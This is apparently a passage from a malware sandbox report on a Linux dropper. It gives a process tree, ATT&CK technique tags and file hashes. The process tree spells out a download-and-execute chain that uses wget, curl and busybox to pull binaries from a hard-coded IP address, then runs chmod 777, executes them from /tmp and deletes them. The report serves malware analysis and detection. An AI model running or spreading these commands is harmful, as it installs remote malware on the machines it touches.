/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:864
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:865
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:867
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:870
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:871
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97